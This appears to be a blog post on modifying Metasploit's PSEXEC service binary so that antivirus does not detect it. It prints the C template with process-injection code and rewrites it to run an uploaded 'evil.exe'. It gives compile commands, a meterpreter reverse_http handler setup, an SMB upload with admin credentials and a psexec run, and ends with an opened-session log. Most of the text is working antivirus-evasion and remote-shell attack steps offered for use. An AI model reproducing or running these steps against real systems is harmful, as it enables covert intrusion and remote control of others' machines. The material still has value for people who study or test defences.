@jabjorkhaug posed the following question on Twitter today:
I figured I could solve this and it would be an interesting challenge. Here is what it gets detected as:
The service binary that is used as part of PSEXEC is located here:
MSF Directory/data/templates/src/pe/exe/service/service.c
The important part to look at starts at line 57:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
|
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#define PAYLOAD_SIZE 8192
char cServiceName[32] = "SERVICENAME";
char bPayload[PAYLOAD_SIZE] = "PAYLOAD:";
SERVICE_STATUS ss;
SERVICE_STATUS_HANDLE hStatus = NULL;
/*
*
*/
BOOL ServiceHandler( DWORD dwControl )
{
if( dwControl == SERVICE_CONTROL_STOP || dwControl == SERVICE_CONTROL_SHUTDOWN )
{
ss.dwWin32ExitCode = 0;
ss.dwCurrentState = SERVICE_STOPPED;
}
return SetServiceStatus( hStatus, &ss );
}
/*
*
*/
VOID ServiceMain( DWORD dwNumServicesArgs, LPSTR * lpServiceArgVectors )
{
CONTEXT Context;
STARTUPINFO si;
PROCESS_INFORMATION pi;
LPVOID lpPayload = NULL;
ZeroMemory( &ss, sizeof(SERVICE_STATUS) );
ZeroMemory( &si, sizeof(STARTUPINFO) );
ZeroMemory( &pi, sizeof(PROCESS_INFORMATION) );
si.cb = sizeof(STARTUPINFO);
ss.dwServiceType = SERVICE_WIN32_SHARE_PROCESS;
ss.dwCurrentState = SERVICE_START_PENDING;
ss.dwControlsAccepted = SERVICE_ACCEPT_STOP|SERVICE_ACCEPT_SHUTDOWN;
hStatus = RegisterServiceCtrlHandler( (LPCSTR)&cServiceName, (LPHANDLER_FUNCTION)ServiceHandler );
if ( hStatus )
{
ss.dwCurrentState = SERVICE_RUNNING;
SetServiceStatus( hStatus, &ss );
if( CreateProcess( NULL, "rundll32.exe", NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi ) )
{
Context.ContextFlags = CONTEXT_FULL;
GetThreadContext( pi.hThread, &Context );
lpPayload = VirtualAllocEx( pi.hProcess, NULL, PAYLOAD_SIZE, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE );
if( lpPayload )
{
WriteProcessMemory( pi.hProcess, lpPayload, &bPayload, PAYLOAD_SIZE, NULL );
#ifdef _WIN64
Context.Rip = (DWORD64)lpPayload;
#else
Context.Eip = (DWORD)lpPayload;
#endif
SetThreadContext( pi.hThread, &Context );
}
ResumeThread( pi.hThread );
CloseHandle( pi.hThread );
CloseHandle( pi.hProcess );
}
ServiceHandler( SERVICE_CONTROL_STOP );
ExitProcess( 0 );
}
}
/*
*
*/
int __stdcall WinMain( HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow )
{
SERVICE_TABLE_ENTRY st[] =
{
{ (LPSTR)&cServiceName, (LPSERVICE_MAIN_FUNCTIONA)&ServiceMain },
{ NULL, NULL }
};
return StartServiceCtrlDispatcher( (SERVICE_TABLE_ENTRY *)&st );
}
|
It’s injecting our payload into the service binary and tossing our payload into “rundll32.exe” at run time on the victim (side note: you can change which bin it goes into ;). Lets change this so it doesn’t do any injection and just executes a binary. That removes the ‘injection’ piece and hopefully lets us get our shell. We are loosing a bit of stealth because instead of just one (the service binary) we are writing two binaries.
To make this change you replace the above with just this:
1
2
3
4
|
if( CreateProcess( NULL, "C:\evil.exe", NULL, NULL, FALSE, DETACHED_PROCESS, NULL, NULL, &si, &pi ) )
{
CloseHandle( pi.hProcess );
}
|
Compiling this on OSX using mingw is very easy and is very similar on Ubuntu if you have mingw installed:
1
|
i386-mingw32-gcc -o service.exe service.c
|
Then just copy it to replace the current one:
1
|
cp service.exe ../../../../template_x86_windows_svc.exe
|
No other changes are needed. Only problem is, how do we get the “evil.exe” up onto the box for it to execute? That’s where the auxiliary module “auxiliary/admin/smb/upload_file” comes in :-) I built a resource file to demo the timeline of getting execution with this new service binary (broken up with comments to explain, remove the comments for it to work):
Start Multi Handler
1
2
3
4
5
6
|
use multi/handler
set PAYLOAD windows/meterpreter/reverse_http
set LHOST 172.16.195.1
set LPORT 80
set ExitOnSession false
exploit -j -z
|
Upload file to evil.exe on the C$ share (C$ is default for this module so no reason to set it)
1
2
3
4
5
6
7
|
use auxiliary/admin/smb/upload_file
set LPATH evil.exe
set RPATH evil.exe
set RHOST 172.16.195.155
set SMBUser Administrator
set SMBPass Password1234!
run
|
Execute PSEXEC using the new service binary that simply executes
1
2
3
4
5
6
7
8
9
|
use exploit/windows/smb/psexec
set RHOST 172.16.195.155
set SMBUser Administrator
set SMBPass Password1234!
set DisablePayloadHandler true
set PAYLOAD windows/meterpreter/reverse_http
set LHOST 172.16.195.1
set LPORT 80
exploit -j -z
|
The passwords could have just as easily been hashes, and the end result is:
Well I can’t really show you that nothing was detected… so I guess you just have to believe me when I say:
1
|
[*] Meterpreter session 2 opened (172.16.195.1:80 -> 172.16.195.155:49169) at Wed Jul 04 16:02:23 -0400 2012
|
w00t!
